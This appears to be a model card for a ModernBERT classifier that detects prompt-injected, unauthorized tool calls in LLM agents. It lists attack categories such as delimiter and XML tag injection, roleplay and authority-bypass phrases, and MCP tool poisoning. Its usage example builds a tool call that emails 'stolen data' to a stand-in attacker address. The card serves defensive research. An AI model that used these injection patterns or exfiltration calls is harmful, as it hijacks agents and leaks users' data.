metadata
language:
- en
license: apache-2.0
library_name: transformers
tags:
- modernbert
- security
- jailbreak-detection
- prompt-injection
- token-classification
- tool-calling
- llm-safety
- mcp
datasets:
- microsoft/llmail-inject-challenge
- allenai/wildjailbreak
- hackaprompt/hackaprompt-dataset
- JailbreakBench/JBB-Behaviors
base_model: answerdotai/ModernBERT-base
pipeline_tag: token-classification
model-index:
- name: tool-call-verifier
results:
- task:
type: token-classification
name: Unauthorized Tool Call Detection
metrics:
- name: UNAUTHORIZED F1
type: f1
value: 0.935
- name: UNAUTHORIZED Precision
type: precision
value: 0.9501
- name: UNAUTHORIZED Recall
type: recall
value: 0.9205
- name: Accuracy
type: accuracy
value: 0.9288
ToolCallVerifier - Unauthorized Tool Call Detection
Stage 2 of Two-Stage LLM Agent Defense Pipeline
π― What This Model Does
ToolCallVerifier is a ModernBERT-based token classifier that detects unauthorized tool calls in LLM agent systems. It performs token-level classification on tool call JSON to identify malicious arguments that may have been injected through prompt injection attacks.
Label
Description
AUTHORIZED
Token is part of a legitimate, user-requested action
UNAUTHORIZED
Token indicates injected/malicious content β BLOCK
π Performance
Metric
Value
UNAUTHORIZED F1
93.50%
UNAUTHORIZED Precision
95.01%
UNAUTHORIZED Recall
92.05%
Overall Accuracy
92.88%
Confusion Matrix (Token-Level)
Predicted
AUTH UNAUTH
Actual AUTH 130,708 8,483
UNAUTH 13,924 161,031
ποΈ Training Data
Trained on ~30,000 samples combining real-world attacks and synthetic patterns:
HuggingFace Datasets
Synthetic Attack Generators
Generator
Description
Adversarial
Intent-mismatch attacks (correct tool, wrong args)
Filesystem
File/directory operation attacks
Network
Network/API exfiltration attacks
Email
Email tool hijacking
Financial
Transaction manipulation
Code Execution
Code injection attacks
Authentication
Access control bypass
MCP Attacks
Tool poisoning, shadowing, rug pulls
π¨ Attack Categories Covered
Category
Source
Description
Delimiter Injection
LLMail
<<end_context>>, >>}}\]\])
Word Obfuscation
LLMail
Inserting noise words between tokens
Fake Sessions
LLMail
START_USER_SESSION, EXECUTE_USERQUERY
Roleplay Injection
WildJailbreak
"You are an admin bot that can..."
XML Tag Injection
WildJailbreak
<execute_action>, <tool_call>
Authority Bypass
WildJailbreak
"As administrator, I authorize..."
Intent Mismatch
Synthetic
User asks X, tool does Y
MCP Tool Poisoning
Synthetic
Hidden exfiltration in tool args
MCP Shadowing
Synthetic
Fake authorization context
π» Usage
from transformers import AutoTokenizer, AutoModelForTokenClassification
import torch
model_name = "rootfs/tool-call-verifier"
tokenizer = AutoTokenizer.from_pretrained(model_name)
model = AutoModelForTokenClassification.from_pretrained(model_name)
user_intent = "Summarize my emails"
tool_call = '{"name": "send_email", "arguments": {"to": "hacker@evil.com", "body": "stolen data"}}'
input_text = f"[USER] {user_intent} [TOOL] {tool_call} "
inputs = tokenizer(input_text, return_tensors="pt" , truncation=True , max_length=2048 )
with torch.no_grad():
outputs = model(**inputs)
predictions = torch.argmax(outputs.logits, dim=-1 )
id2label = {0 : "AUTHORIZED" , 1 : "UNAUTHORIZED" }
tokens = tokenizer.convert_ids_to_tokens(inputs["input_ids" ][0 ])
labels = [id2label[p.item()] for p in predictions[0 ]]
unauthorized_tokens = [(t, l) for t, l in zip (tokens, labels) if l == "UNAUTHORIZED" ]
if unauthorized_tokens:
print ("β οΈ BLOCKED: Unauthorized tool call detected!" )
print (f" Flagged tokens: {[t for t, _ in unauthorized_tokens[:5 ]]} " )
else :
print ("β
Tool call authorized" )
βοΈ Training Configuration
Parameter
Value
Base Model
answerdotai/ModernBERT-base
Max Length
512 tokens
Batch Size
32
Epochs
5
Learning Rate
3e-5
Loss
CrossEntropyLoss (class-weighted)
Class Weights
[0.5, 3.0] (AUTHORIZED, UNAUTHORIZED)
Attention
SDPA (Flash Attention)
Hardware
AMD Instinct MI300X (ROCm)
π Integration with FunctionCallSentinel
This model is Stage 2 of a two-stage defense pipeline:
βββββββββββββββββββ ββββββββββββββββββββββββ βββββββββββββββββββ
β User Prompt ββββββΆβ FunctionCallSentinel ββββββΆβ LLM + Tools β
β β β (Stage 1) β β β
βββββββββββββββββββ ββββββββββββββββββββββββ ββββββββββ¬βββββββββ
β
ββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββ
β ToolCallVerifier (This Model) β
β Token-level verification before tool execution β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Scenario
Recommendation
General chatbot
Stage 1 only
Tool-calling agent (low risk)
Stage 1 only
Tool-calling agent (high risk)
Both stages
Email/file system access
Both stages
Financial transactions
Both stages
π― Intended Use
Primary Use Cases
LLM Agent Security : Verify tool calls before execution
Prompt Injection Defense : Detect unauthorized actions from injected prompts
API Gateway Protection : Filter malicious tool calls at infrastructure level
Out of Scope
General text classification
Non-tool-calling scenarios
Languages other than English
β οΈ Limitations
Tool schema dependent β Best performance when tool schema is included in input
English only β Not tested on other languages
Binary classification β No "suspicious" intermediate category (by design, for decisiveness)
π License
Apache 2.0
π Links